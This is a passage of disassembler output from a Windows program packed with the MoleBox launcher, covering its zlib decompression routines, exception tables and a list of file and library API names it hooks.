cmp eax, [ebp+arg_0]
jb short loc_50D717
xor edx, edx
loc_50D72F: ; CODE XREF: sub_50D425+2EA�j
mov ecx, [ebp+var_2C]
push 1
pop eax
shl eax, cl
mov ecx, [ebp+var_C]
loc_50D73A: ; CODE XREF: sub_50D425+31D�j
test eax, ecx
jz short loc_50D744
xor ecx, eax
shr eax, 1
jmp short loc_50D73A
; ---------------------------------------------------------------------------
loc_50D744: ; CODE XREF: sub_50D425+317�j
xor ecx, eax
mov eax, [ebp+var_8]
mov [ebp+var_C], ecx
lea eax, [ebp+eax*4+var_B4]
loc_50D753: ; CODE XREF: sub_50D425+346�j
push 1
mov ecx, ebx
pop esi
shl esi, cl
dec esi
and esi, [ebp+var_C]
cmp esi, [eax]
jz short loc_50D76D
dec [ebp+var_8]
sub eax, 4
sub ebx, [ebp+arg_18]
jmp short loc_50D753
; ---------------------------------------------------------------------------
loc_50D76D: ; CODE XREF: sub_50D425+33B�j
mov eax, [ebp+var_14]
dec [ebp+var_14]
test eax, eax
jnz loc_50D5BA
loc_50D77B: ; CODE XREF: sub_50D425+18F�j
inc [ebp+var_4]
add [ebp+var_20], 4
mov eax, [ebp+var_4]
inc [ebp+var_2C]
cmp eax, [ebp+var_18]
jle loc_50D5A7
loc_50D791: ; CODE XREF: sub_50D425+16C�j
cmp [ebp+var_30], edx
jz loc_50D48A
cmp [ebp+var_18], 1
jz loc_50D48A
push 0FFFFFFFBh
loc_50D7A6: ; CODE XREF: sub_50D425+1F9�j
pop eax
jmp loc_50D48C
sub_50D425 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50D7AC proc near ; CODE XREF: sub_50BC4B+56C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, [ebp+arg_20]
push 4
push 120h
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebp+arg_20], eax
test eax, eax
jnz short loc_50D7D7
push 0FFFFFFFCh
pop eax
jmp loc_50D8AC
; ---------------------------------------------------------------------------
loc_50D7D7: ; CODE XREF: sub_50D7AC+21�j
push ebx
push edi
push eax
lea eax, [ebp+var_4]
push eax
mov ebx, [ebp+arg_0]
push [ebp+arg_1C]
mov edi, 101h
push [ebp+arg_C]
push [ebp+arg_14]
push offset dword_50E12C
push offset dword_50E0B0
push edi
push ebx
push [ebp+arg_8]
call sub_50D425
add esp, 28h
test eax, eax
jnz short loc_50D87E
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 0
jz short loc_50D891
push [ebp+arg_20]
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+arg_8]
push [ebp+arg_1C]
lea eax, [eax+ebx*4]
push [ebp+arg_10]
push [ebp+arg_18]
push offset dword_50E220
push offset dword_50E1A8
push 0
push [ebp+arg_4]
push eax
call sub_50D425
add esp, 28h
test eax, eax
jnz short loc_50D854
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 0
jnz short loc_50D850
cmp ebx, edi
ja short loc_50D875
loc_50D850: ; CODE XREF: sub_50D7AC+9E�j
xor edi, edi
jmp short loc_50D89D
; ---------------------------------------------------------------------------
loc_50D854: ; CODE XREF: sub_50D7AC+96�j
cmp eax, 0FFFFFFFDh
jnz short loc_50D862
mov dword ptr [esi+18h], offset aOversubscrib_0 ; "oversubscribed distance tree"
jmp short loc_50D89B
; ---------------------------------------------------------------------------
loc_50D862: ; CODE XREF: sub_50D7AC+AB�j
cmp eax, 0FFFFFFFBh
jnz short loc_50D870
mov dword ptr [esi+18h], offset aIncompleteDist ; "incomplete distance tree"
jmp short loc_50D898
; ---------------------------------------------------------------------------
loc_50D870: ; CODE XREF: sub_50D7AC+B9�j
cmp eax, 0FFFFFFFCh
jz short loc_50D89B
loc_50D875: ; CODE XREF: sub_50D7AC+A2�j
mov dword ptr [esi+18h], offset aEmptyDistanceT ; "empty distance tree with lengths"
jmp short loc_50D898
; ---------------------------------------------------------------------------
loc_50D87E: ; CODE XREF: sub_50D7AC+5C�j
cmp eax, 0FFFFFFFDh
jnz short loc_50D88C
mov dword ptr [esi+18h], offset aOversubscrib_1 ; "oversubscribed literal/length tree"
jmp short loc_50D89B
; ---------------------------------------------------------------------------
loc_50D88C: ; CODE XREF: sub_50D7AC+D5�j
cmp eax, 0FFFFFFFCh
jz short loc_50D89B
loc_50D891: ; CODE XREF: sub_50D7AC+64�j
mov dword ptr [esi+18h], offset aIncompleteLite ; "incomplete literal/length tree"
loc_50D898: ; CODE XREF: sub_50D7AC+C2�j
; sub_50D7AC+D0�j
push 0FFFFFFFDh
pop eax
loc_50D89B: ; CODE XREF: sub_50D7AC+B4�j
; sub_50D7AC+C7�j ...
mov edi, eax
loc_50D89D: ; CODE XREF: sub_50D7AC+A6�j
push [ebp+arg_20]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov eax, edi
pop ecx
pop edi
pop ebx
loc_50D8AC: ; CODE XREF: sub_50D7AC+26�j
pop esi
leave
retn
sub_50D7AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50D8AF proc near ; CODE XREF: sub_50BC4B+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, ds:dword_50F120
mov [eax], ecx
mov eax, [ebp+arg_4]
mov ecx, ds:dword_50F124
mov [eax], ecx
mov eax, [ebp+arg_8]
mov dword ptr [eax], offset dword_50F128
mov eax, [ebp+arg_C]
mov dword ptr [eax], offset dword_510128
xor eax, eax
pop ebp
retn
sub_50D8AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50D8DE proc near ; CODE XREF: sub_50BC4B+1F0�p
; sub_50BC4B+846�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov edx, [ebx+30h]
push edi
mov edi, [ebx+34h]
mov eax, [esi+0Ch]
cmp edx, edi
mov [ebp+var_8], eax
mov [ebp+arg_0], edx
jbe short loc_50D902
mov edi, [ebx+2Ch]
loc_50D902: ; CODE XREF: sub_50D8DE+1F�j
mov eax, [esi+10h]
sub edi, edx
cmp edi, eax
mov [ebp+var_4], edi
jbe short loc_50D913
mov [ebp+var_4], eax
mov edi, eax
loc_50D913: ; CODE XREF: sub_50D8DE+2E�j
test edi, edi
jz short loc_50D921
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_50D921
and [ebp+arg_8], 0
loc_50D921: ; CODE XREF: sub_50D8DE+37�j
; sub_50D8DE+3D�j
add [esi+14h], edi
sub eax, edi
mov [esi+10h], eax
mov eax, [ebx+38h]
test eax, eax
jz short loc_50D943
push edi
push edx
push dword ptr [ebx+3Ch]
call eax
mov edx, [ebp+arg_0]
mov [ebx+3Ch], eax
add esp, 0Ch
mov [esi+30h], eax
loc_50D943: ; CODE XREF: sub_50D8DE+50�j
mov ecx, edi
mov edi, [ebp+var_8]
mov eax, ecx
mov esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+var_4]
add [ebp+var_8], eax
add [ebp+arg_0], eax
and ecx, 3
rep movsb
mov eax, [ebx+2Ch]
cmp [ebp+arg_0], eax
jnz short loc_50D9DC
mov edx, [ebx+28h]
cmp [ebx+34h], eax
mov [ebp+arg_0], edx
jnz short loc_50D977
mov [ebx+34h], edx
loc_50D977: ; CODE XREF: sub_50D8DE+94�j
mov esi, [ebp+arg_4]
mov edi, [ebx+34h]
sub edi, edx
mov eax, [esi+10h]
mov [ebp+var_4], edi
cmp edi, eax
jbe short loc_50D98E
mov [ebp+var_4], eax
mov edi, eax
loc_50D98E: ; CODE XREF: sub_50D8DE+A9�j
test edi, edi
jz short loc_50D99C
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_50D99C
and [ebp+arg_8], 0
loc_50D99C: ; CODE XREF: sub_50D8DE+B2�j
; sub_50D8DE+B8�j
add [esi+14h], edi
sub eax, edi
mov [esi+10h], eax
mov eax, [ebx+38h]
test eax, eax
jz short loc_50D9BE
push edi
push edx
push dword ptr [ebx+3Ch]
call eax
mov edx, [ebp+arg_0]
mov [ebx+3Ch], eax
add esp, 0Ch
mov [esi+30h], eax
loc_50D9BE: ; CODE XREF: sub_50D8DE+CB�j
mov ecx, edi
mov edi, [ebp+var_8]
mov eax, ecx
mov esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+var_4]
add [ebp+var_8], eax
and ecx, 3
add [ebp+arg_0], eax
rep movsb
loc_50D9DC: ; CODE XREF: sub_50D8DE+89�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
pop edi
pop esi
mov [eax+0Ch], ecx
mov eax, [ebp+arg_0]
mov [ebx+30h], eax
mov eax, [ebp+arg_8]
pop ebx
leave
retn
sub_50D8DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50D9F3 proc near ; CODE XREF: sub_500C5C+32C�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
mov eax, [ebp+arg_8]
push esi
mov esi, [ebp+arg_4]
mov [ebp+var_38], eax
mov eax, [ebp+arg_C]
and [ebp+var_18], 0
mov [ebp+var_34], eax
mov eax, [ebp+arg_0]
and [ebp+var_14], 0
mov [ebp+var_2C], eax
mov eax, [esi]
push edi
mov [ebp+var_28], eax
push 38h
lea eax, [ebp+var_38]
push offset byte_50F0A8
push eax
call sub_50D02B
add esp, 0Ch
test eax, eax
jnz short loc_50DA6E
lea eax, [ebp+var_38]
push 4
push eax
call sub_50D043
mov edi, eax
pop ecx
cmp edi, 1
pop ecx
jz short loc_50DA5F
lea eax, [ebp+var_38]
push eax
call sub_50CF00
test edi, edi
pop ecx
jnz short loc_50DA5B
push 0FFFFFFFBh
pop eax
jmp short loc_50DA6E
; ---------------------------------------------------------------------------
loc_50DA5B: ; CODE XREF: sub_50D9F3+61�j
mov eax, edi
jmp short loc_50DA6E
; ---------------------------------------------------------------------------
loc_50DA5F: ; CODE XREF: sub_50D9F3+53�j
mov eax, [ebp+var_24]
mov [esi], eax
lea eax, [ebp+var_38]
push eax
call sub_50CF00
pop ecx
loc_50DA6E: ; CODE XREF: sub_50D9F3+3F�j
; sub_50D9F3+66�j ...
pop edi
pop esi
leave
retn
sub_50D9F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50DA72 proc near ; DATA XREF: sub_50CF41+41�o
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
imul eax, [ebp+arg_8]
push eax
call sub_50835A
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_50DA72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50DA8C proc near ; DATA XREF: sub_50CF41+50�o
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
call sub_5083DD
pop ecx
leave
retn
sub_50DA8C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50DAB0 proc near ; CODE XREF: sub_4FDB8D+5�j
; _5:004FDB97�j
push ebp
mov ebp, esp
push offset aApiNopefunc ; ":API:NopeFunc"
call sub_5084F7
pop ebp
retn
sub_50DAB0 endp ; sp-analysis failed
_5 ends
; Section 7. (virtual address 0010E000)
; Virtual size : 00000D76 ( 3446.)
; Section size in file : 00000D76 ( 3446.)
; Offset to raw data for section: 0010E000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_6 segment para public 'CODE' use32
assume cs:_6
;org 50E000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dword_50E000 dd 77E79908h ; DATA XREF: sub_4FD2E0+3AD�r
; sub_4FD2E0+3B8�r ...
dword_50E004 dd 77E7A5FDh ; DATA XREF: sub_4FD2E0+1D9�r
; sub_4FD2E0+1ED�r ...
dword_50E008 dd 77E79A45h ; DATA XREF: sub_4FD2E0+1A5�r
; sub_4FD2E0+398�r ...
dword_50E00C dd 77E6D706h ; DATA XREF: sub_4FD2E0+12B�r
; sub_4FD2E0+173�r ...
dword_50E010 dd 77E79881h ; DATA XREF: sub_4FD2E0+1A�r
; sub_4FD2E0+108�r ...
dword_50E014 dd 77E79F93h ; DATA XREF: sub_4FD2E0+A�r
; sub_4FD2E0+1B0�r ...
dword_50E018 dd 77F7E300h ; DATA XREF: sub_4FC060+4�r
; sub_4FF12B+15�r ...
dword_50E01C dd 77F7E21Fh ; DATA XREF: sub_4FC000+2C�r
; sub_4FF036+65�r ...
dword_50E020 dd 77E6C10Bh ; DATA XREF: sub_502DD0+1A1�r
dword_50E024 dd 77E6E154h ; DATA XREF: sub_5071C3+114�r
dword_50E028 dd 77E61A90h ; DATA XREF: sub_507494+3A�r
; sub_507494+7C�r ...
dword_50E02C dd 77E62050h ; DATA XREF: sub_50ADDE+3F�r
dword_50E030 dd 77E641EBh ; DATA XREF: sub_4FCDBF+59�r
; sub_4FCDBF+8D�r
dword_50E034 dd 77E781F9h ; DATA XREF: sub_4FCA80+42�r
; sub_4FCA80+14D�r ...
dword_50E038 dd 77E77405h ; DATA XREF: sub_4FCA80+5E�r
; sub_4FCA80+A7�r
dword_50E03C dd 77F6183Eh ; DATA XREF: sub_4FCF68�r
dword_50E040 dd 77E79924h ; DATA XREF: sub_4FCA80+20D�r
dword_50E044 dd 77E77CCEh ; DATA XREF: sub_4FCA80+DF�r
; sub_4FCA80+137�r ...
dword_50E048 dd 77E7C866h ; DATA XREF: sub_4FCDBF+3F�r
; sub_4FCDBF+12D�r
align 10h
dword_50E050 dd 77D46F5Bh ; DATA XREF: sub_4FC15E+AD�r
dword_50E054 dd 77D4B1B0h ; DATA XREF: sub_4FC271+B8�r
align 10h
dword_50E060 dd 10h ; DATA XREF: sub_50BC4B+36F�r
; sub_50BC4B+3A0�r
dd 11h, 12h, 0
dd 8, 7, 9, 6, 0Ah, 5, 0Bh, 4, 0Ch, 3, 0Dh, 2, 0Eh, 1
dd 0Fh, 0FFFF0000h
dword_50E0B0 dd 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Dh, 0Fh, 11h, 13h, 17h
; DATA XREF: sub_50D7AC+48�o
dd 1Bh, 1Fh, 23h, 2Bh, 33h, 3Bh, 43h, 53h, 63h, 73h, 83h
dd 0A3h, 0C3h, 0E3h, 102h, 2 dup(0)
dword_50E12C dd 8 dup(0) ; DATA XREF: sub_50D7AC+43�o
dd 4 dup(1), 4 dup(2), 4 dup(3), 4 dup(4), 4 dup(5), 0
dd 2 dup(70h)
dword_50E1A8 dd 1, 2, 3, 4, 5, 7, 9, 0Dh, 11h, 19h, 21h, 31h, 41h, 61h
; DATA XREF: sub_50D7AC+81�o
dd 81h, 0C1h, 101h, 181h, 201h, 301h, 401h, 601h, 801h
dd 0C01h, 1001h, 1801h, 2001h, 3001h, 4001h, 6001h
dword_50E220 dd 4 dup(0) ; DATA XREF: sub_50D7AC+7C�o
dd 2 dup(1), 2 dup(2), 2 dup(3), 2 dup(4), 2 dup(5), 2 dup(6)
dd 2 dup(7), 2 dup(8), 2 dup(9), 2 dup(0Ah), 2 dup(0Bh)
dd 2 dup(0Ch), 2 dup(0Dh)
dword_50E298 dd 0FFFFFFFFh, 0 ; DATA XREF: _5:004FEBB5�o
dd offset sub_4FEDE4
align 8
dd offset loc_4FEDB2+2
dd offset loc_4FEDBA
dword_50E2B0 dd 0FFFFFFFFh, 0 ; DATA XREF: _5:004FEE35�o
dd offset sub_4FF00C
align 10h
dword_50E2C0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4FF036+5�o
dd offset sub_4FF12B
align 10h
dword_50E2D0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4FF252+5�o
dd offset sub_4FF61F
align 10h
dword_50E2E0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4FC000+5�o
dd offset sub_4FC05D
align 10h
dword_50E2F0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4FF6DE+5�o
; ---------------------------------------------------------------------------
jmp near ptr dword_5132F4
; ---------------------------------------------------------------------------
align 10h
dword_50E300 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4FF818+5�o
dd offset sub_4FF91D
align 10h
dword_50E310 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4FF94C+5�o
dd offset sub_4FFCA7
dd 2 dup(0)
dd offset sub_4FFA93
dword_50E328 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4FFD24+5�o
dd offset loc_4FFE9E
align 8
dword_50E338 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4FFECD+5�o
dd offset loc_4FFF90
align 8
dword_50E348 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4FFFBF+5�o
dd offset loc_5001D1
align 8
dword_50E358 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_500216+5�o
dd offset sub_500317
align 8
dword_50E368 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_500421+5�o
dd offset sub_500643
align 8
dword_50E378 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_500672+5�o
dd offset sub_500712
align 8
dword_50E388 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_500741+5�o
dd offset loc_500829
align 8
dword_50E398 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_500858+5�o
dd offset sub_500921
align 8
dword_50E3A8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_500950+5�o
dd offset sub_5009E1
align 8
dword_50E3B8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_500C5C+5�o
dd offset sub_500E9D
align 8
dword_50E3C8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_501177+5�o
dd offset sub_501441
align 8
dword_50E3D8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_50153F+5�o
dd offset sub_5018B0
align 8
dword_50E3E8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_5019D2+5�o
dd offset sub_501A8F
align 8
dword_50E3F8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_501CC4+5�o
dd offset sub_502194
align 8
dword_50E408 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_502DD0+5�o
dd offset sub_5035A2
align 8
dd offset loc_503354
dd offset loc_503385
dword_50E420 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_503610+5�o
dd offset sub_504427
align 10h
dword_50E430 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_504490+5�o
dd offset sub_50469C
align 10h
dword_50E440 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_5046D0+5�o
dd offset sub_504791
align 10h
dword_50E450 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_5047BF+5�o
dd offset sub_50487F
align 10h
dword_50E460 dd 0FFFFFFFFh, 505388h, 50539Bh, 0 ; DATA XREF: sub_5050D0+5�o
dd offset loc_505250
dd offset loc_505264
dword_50E478 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_505456+5�o
dd offset loc_5056BB
align 8
dword_50E488 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_505A41+5�o
dd offset sub_505AB3
align 8
dword_50E498 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_505BD7+5�o
dd offset nullsub_2
align 8
dd offset loc_505F3B
dd offset loc_505F44
dd 2 dup(0)
dd offset sub_505FCD
align 10h
dword_50E4C0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_5061E1+5�o
dd offset sub_507085
align 10h
dd offset sub_506B7F
dd offset sub_506B88
dd 1, 0
dd offset sub_506B0E
align 8
dword_50E4E8 dd 0FFFFFFFFh, 5072E3h, 50731Dh ; DATA XREF: sub_5071C3+5�o
off_50E4F4 dd offset aMoleboxLaunche ; DATA XREF: sub_508401+13�r
; sub_508C27+252�r
; "MoleBox launcher fatal error"
off_50E4F8 dd offset aAssertionFai_2 ; DATA XREF: sub_4FF036+B6�r
; sub_4FF94C+BF�r ...
; "ASSERTION failed"
off_50E4FC dd offset aStripped ; DATA XREF: sub_4FF036+BE�r
; sub_4FF94C+C7�r ...
; "<stripped>"
dword_50E500 dd 0FFFFFFFFh, 508472h, 508476h, 0 ; DATA XREF: sub_508436+5�o
dword_50E510 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_508538+5�o
dd offset loc_5086FC
align 10h
dword_50E520 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_508726+5�o
dd offset sub_5087AB
align 10h
dword_50E530 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_5087CA+5�o
dd offset sub_508864
align 10h
dword_50E540 dd 0FFFFFFFFh, 508BFBh, 508BFFh, 0 ; DATA XREF: sub_508A16+5�o
dword_50E550 dd 0FFFFFFFFh, 508FE0h, 508FE4h, 0 ; DATA XREF: sub_508EF3+5�o
dword_50E560 dd 0FFFFFFFFh, 50922Ch, 509230h, 0FFFFFFFFh, 5092A5h, 5092A9h
; DATA XREF: sub_50918E+5�o
dword_50E578 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_509518+5�o
dd offset loc_509615
align 8
dword_50E588 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_509638+5�o
dd offset sub_509696
align 8
dword_50E598 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_509789+5�o
dd offset loc_50989D
align 8
dword_50E5A8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_5098C0+5�o
dd offset loc_5099A2
dword_50E5B4 dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0 ; DATA XREF: sub_509DD4+FB�o
; sub_509DD4+15F�o ...
dword_50E5C4 dd 33696467h, 6C642E32h, 6Ch ; DATA XREF: sub_509DD4+10F�o
; sub_50B23E+5�o ...
dword_50E5D0 dd 72657375h, 642E3233h, 6C6Ch ; DATA XREF: sub_509DD4+123�o
dword_50E5DC dd 33656C6Fh, 6C642E32h, 6Ch, 61766461h, 32336970h, 6C6C642Eh
; DATA XREF: sub_509518+C2�o
; sub_509789+6E�o ...
dd 0
dword_50E5F8 dd 61656C6Fh, 32337475h, 6C6C642Eh, 0 ; DATA XREF: sub_5099C5+30�o
; sub_509A34+6F�o ...
aSetunhandled_0 db 'SetUnhandledExceptionFilter',0 ; DATA XREF: _7:00511254�o
aCreatefilea_1 db 'CreateFileA',0 ; DATA XREF: _7:0051125C�o
aCreatefilew_0 db 'CreateFileW',0 ; DATA XREF: _7:00511264�o
aReadfile_2 db 'ReadFile',0 ; DATA XREF: _7:00511284�o
align 4
aClosehandle_1 db 'CloseHandle',0 ; DATA XREF: _7:0051128C�o
aSetfilepoint_1 db 'SetFilePointer',0 ; DATA XREF: _7:00511294�o
align 4
aGetfilesize_0 db 'GetFileSize',0 ; DATA XREF: _7:0051129C�o
aExitprocess_1 db 'ExitProcess',0 ; DATA XREF: _7:005112A4�o
aCreatefilema_2 db 'CreateFileMappingA',0 ; DATA XREF: _7:005112AC�o
align 10h
aCreatefilema_3 db 'CreateFileMappingW',0 ; DATA XREF: _7:005112B4�o
align 4
aLoadlibrarya_0 db 'LoadLibraryA',0 ; DATA XREF: _7:005112D4�o
align 4
aLoadlibraryw db 'LoadLibraryW',0 ; DATA XREF: _7:005112DC�o
align 4
aLoadlibrarye_0 db 'LoadLibraryExA',0 ; DATA XREF: _7:005112E4�o
align 4
aLoadlibraryexw db 'LoadLibraryExW',0 ; DATA XREF: _7:005112EC�o
align 4
aFreelibrary_0 db 'FreeLibrary',0 ; DATA XREF: _7:005112CC�o
aGetprocaddre_0 db 'GetProcAddress',0 ; DATA XREF: _7:005112F4�o
align 10h
aLoadimagea_0 db 'LoadImageA',0 ; DATA XREF: _7:005113DC�o
align 4
aMapviewoffil_0 db 'MapViewOfFile',0 ; DATA XREF: _7:005112BC�o
align 4
aUnmapviewoff_0 db 'UnmapViewOfFile',0 ; DATA XREF: _7:005112C4�o
aGetfileattri_3 db 'GetFileAttributesA',0 ; DATA XREF: _7:0051126C�o
align 10h
aGetfileattri_4 db 'GetFileAttributesW',0 ; DATA XREF: _7:00511274�o
align 4
aGetfileattri_5 db 'GetFileAttributesExW',0 ; DATA XREF: _7:0051127C�o
align 4
aGetmodulehan_0 db 'GetModuleHandleA',0 ; DATA XREF: _7:00511354�o
align 10h
aGetmodulehan_1 db 'GetModuleHandleW',0 ; DATA XREF: _7:0051135C�o
align 4
aGetmodulefil_1 db 'GetModuleFileNameA',0 ; DATA XREF: _7:005113AC�o
align 4
aGetmodulefil_2 db 'GetModuleFileNameW',0 ; DATA XREF: _7:005113B4�o
align 4
aGetlongpathn_1 db 'GetLongPathNameA',0 ; DATA XREF: _7:005113BC�o
align 10h
aGetlongpathn_2 db 'GetLongPathNameW',0 ; DATA XREF: _7:005113C4�o
align 4
aSearchpathw db 'SearchPathW',0 ; DATA XREF: sub_50A226+B2�o
; _7:00511364�o
aSearchpatha_0 db 'SearchPathA',0 ; DATA XREF: sub_50A1C7+D�o
; _7:0051136C�o
aAddfontresou_0 db 'AddFontResourceA',0 ; DATA XREF: sub_50B23E+A�o
; _7:005113CC�o
align 10h
aRemovefontre_0 db 'RemoveFontResourceA',0 ; DATA XREF: sub_50B277+A�o
; _7:005113D4�o
aFindfirstfil_1 db 'FindFirstFileA',0 ; DATA XREF: _7:005112FC�o
align 4
aFindfirstfilew db 'FindFirstFileW',0 ; DATA XREF: sub_50A361+92�o
; _7:00511304�o
align 4
aFindclose_0 db 'FindClose',0
align 10h
aFindnextfile_1 db 'FindNextFileA',0 ; DATA XREF: _7:0051131C�o
align 10h
aFindnextfilew db 'FindNextFileW',0 ; DATA XREF: sub_50A657+2E�o
; _7:00511324�o
align 10h
aFindfirstfilee db 'FindFirstFileExW',0 ; DATA XREF: sub_50A4AA+92�o
; _7:0051130C�o
align 4
a_lopen db '_lopen',0 ; DATA XREF: sub_50B636+25�o
; _7:00511334�o
align 4
aOpenfile db 'OpenFile',0 ; DATA XREF: sub_50B582+93�o
; _7:0051132C�o
align 4
a_lread db '_lread',0 ; DATA XREF: sub_50B711+27�o
; _7:00511344�o
align 10h
a_llseek db '_llseek',0 ; DATA XREF: sub_50B6CC+20�o
; _7:0051134C�o
a_lclose db '_lclose',0 ; DATA XREF: sub_50B677+23�o
; _7:0051133C�o
aCocreateinstan db 'CoCreateInstance',0 ; DATA XREF: sub_509518+C7�o
; _7:005113E4�o
align 4
aCocreateinst_0 db 'CoCreateInstanceEx',0 ; DATA XREF: sub_509789+73�o
; _7:005113EC�o
align 4
aCogetclassobje db 'CoGetClassObject',0 ; DATA XREF: sub_5098C0+AC�o
; _7:005113F4�o
align 4
aGetprivatepr_2 db 'GetPrivateProfileStringA',0 ; DATA XREF: _7:00511374�o
align 4
aGetprivatepr_3 db 'GetPrivateProfileIntA',0 ; DATA XREF: _7:0051137C�o
align 10h
aGetprivatepr_4 db 'GetPrivateProfileSectionNamesA',0 ; DATA XREF: _7:00511384�o
align 10h
aGetprivatepr_5 db 'GetPrivateProfileSectionA',0 ; DATA XREF: _7:0051138C�o
align 4
aGetfileinfor_0 db 'GetFileInformationByHandle',0 ; DATA XREF: _7:00511394�o
align 4
aLockfile_0 db 'LockFile',0 ; DATA XREF: _7:0051139C�o
align 4
aLockfileex db 'LockFileEx',0
align 10h
aUnlockfile_0 db 'UnlockFile',0 ; DATA XREF: _7:005113A4�o
align 4
aUnlockfileex db 'UnlockFileEx',0
align 4
aGetrecordinf_0 db 'GetRecordInfoFromGuids',0 ; DATA XREF: sub_509A34+D2�o
; _7:005113FC�o
align 4
aGetrecordinfof db 'GetRecordInfoFromTypeInfo',0 ; DATA XREF: sub_5099C5+35�o
align 10h
aLoadregtypelib db 'LoadRegTypeLib',0 ; DATA XREF: sub_509B3C+84�o
; _7:00511404�o
align 10h
aLoadtypelib db 'LoadTypeLib',0 ; DATA XREF: sub_509A34+74�o
; sub_509B3C+4F�o
align 10h
dword_50EA00 dd 0FFFFFFFFh, 50A115h, 50A119h, 0FFFFFFFFh, 50A129h, 50A12Dh
; DATA XREF: sub_50A0C8+5�o
dd 0FFFFFFFFh, 50A14Ah, 50A14Eh, 0FFFFFFFFh, 50A15Eh, 50A162h
dd 0FFFFFFFFh, 50A183h, 50A187h, 0FFFFFFFFh, 50A197h, 50A19Bh
dword_50EA48 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_50A226+5�o
dd offset loc_50A311
align 8
dword_50EA58 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_50A361+5�o
dd offset sub_50A480
align 8
dword_50EA68 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_50A4AA+5�o
dd offset sub_50A5D5
align 8
dword_50EA78 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_50A7DD+5�o
dd offset sub_50A886
align 8
